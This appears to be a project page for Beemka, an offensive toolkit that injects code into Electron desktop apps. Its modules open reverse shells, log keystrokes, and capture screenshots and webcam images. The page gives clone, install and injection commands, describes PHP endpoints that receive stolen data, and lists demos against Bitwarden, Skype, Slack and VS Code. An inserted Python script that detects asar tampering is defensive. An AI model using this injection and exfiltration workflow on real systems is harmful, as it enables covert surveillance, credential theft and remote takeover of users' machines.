beemka: Basic Electron Exploitation

BEEMKA – Electron Exploitation Toolkit

Modules

Available modules

[ rshell_cmd ] Windows Reverse Shell
[ rshell_linux ] Linux Reverse Shell
[ screenshot ] Screenshot Module
[ rshell_powershell ] PowerShell Reverse Shell
[ keylogger ] Keylogger Module
[ webcamera ] WebCamera Module

Install

Requirements

  • Python 3.5+
  • jsmin

Download

git clone https://github.com/ctxis/beemka.git
cd beemka
pip3 install -r requirements.txt

Use

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                    [-m MODULE] [-u] [-z]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list-modules    List all available modules.
  -i, --inject          Inject code into Electron.
  -f ASAR_FILE, --asar ASAR_FILE
                        Path to electron.asar file.
  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                        Temporary working path to use for extracting asar
                        archives.
  -o OUTPUT_FILE, --output OUTPUT_FILE
                        Path to the file that will be generated.
  -m MODULE, --module MODULE
                        Module to inject. Use --list-modules to list available
                        modules.
  -u, --unpack          Unpack asar file.
  -z, --pack            Pack asar file.

Injecting a module into an application:

python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"
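Seen from the defender's side, injection rewrites the contents of the asar archive, so a per-file hash manifest compared against a known-good copy shows which entries were added or changed. The script below is an added example, not part of Beemka or the original page. The function names and the sample archive (built inline with constructed file names) are assumptions.

```python
import hashlib, json, struct

def asar_manifest(blob):
    """Return {path: sha256 hex} for every file packed inside an ASAR archive."""
    size_pickle, header_size, _payload, json_len = struct.unpack_from("<4I", blob, 0)
    if size_pickle != 4 or 16 + json_len > len(blob):
        raise ValueError("not an ASAR archive")
    header = json.loads(blob[16:16 + json_len])   # JSON index of the archive
    base = 8 + header_size                        # file data starts after the header
    manifest = {}
    def walk(node, prefix):
        for name, entry in node["files"].items():
            if "files" in entry:                  # directory: recurse
                walk(entry, prefix + name + "/")
            elif "offset" in entry:               # packed file (unpacked/link entries have none)
                start = base + int(entry["offset"])
                data = blob[start:start + entry["size"]]
                if len(data) != entry["size"]:
                    raise ValueError("truncated entry: " + prefix + name)
                manifest[prefix + name] = hashlib.sha256(data).hexdigest()
    walk(header, "")
    return manifest

def diff_manifests(baseline, current):
    """Compare a known-good manifest with the one found on disk."""
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "modified": sorted(p for p in baseline.keys() & current.keys()
                               if baseline[p] != current[p])}

def build_sample_asar(files):
    """Constructed test input: pack {path: bytes} into the ASAR layout."""
    tree, body = {"files": {}}, b""
    for path, data in files.items():
        *dirs, name = path.split("/")
        node = tree
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(data), "offset": str(len(body))}
        body += data
    js = json.dumps(tree).encode()
    pad = -len(js) % 4                            # Pickle strings are 4-byte aligned
    head = struct.pack("<4I", 4, 8 + len(js) + pad, 4 + len(js) + pad, len(js))
    return head + js + b"\0" * pad + body

if __name__ == "__main__":
    good = {"main.js": b"startApp();", "lib/ui.js": b"render();"}   # constructed
    seen = {**good, "main.js": b"startApp(); extra();", "lib/new.js": b"x"}
    a, b = (asar_manifest(build_sample_asar(f)) for f in (good, seen))
    print(diff_manifests(a, b))
```

For a real check, read the archive bytes from disk and keep the baseline manifest from a trusted install of the same application version.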

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

Demo

  • Bitwarden Password Egress
  • Skype Reverse Shell (Linux)
  • Slack Desktop Screenshots
  • VS Code WebCamera


Source: https://github.com/ctxis/